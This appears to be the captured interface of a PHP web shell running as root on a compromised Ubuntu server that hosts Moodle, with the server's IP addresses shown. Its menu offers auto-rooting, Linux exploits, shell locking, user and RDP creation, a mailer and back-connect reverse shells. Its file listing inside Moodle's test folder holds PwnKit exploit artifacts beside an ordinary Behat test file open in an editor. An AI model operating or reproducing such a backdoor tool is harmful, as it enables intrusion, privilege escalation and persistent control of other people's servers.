Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
admin /
tool /
log /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
logstore_store_visibility_chan...
1.05
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : logstore_store_visibility_change.feature
@tool_log @report @report_configlog Feature: In a report, admin can see logstore visibility changes # Change log stores visibility so the report contains known data. Background: Given I log in as "admin" And the following config values are set as admin: | enabled_stores | logstore_standard | tool_log | @javascript Scenario: Display configuration changes report When I navigate to "Plugins > Logging > Manage log stores" in site administration And I click on "Disable" "icon" in the "Standard log" "table_row" And I click on "Enable" "icon" in the "External database log" "table_row" And I navigate to "Reports > Config changes" in site administration Then the following should exist in the "report-configlog-report-table" table: | User | Plugin | Setting | New value | Original value | | Admin User | logstore_standard | tool_logstore_visibility | 0 | 1 | | Admin User | logstore_database | tool_logstore_visibility | 1 | 0 |
Close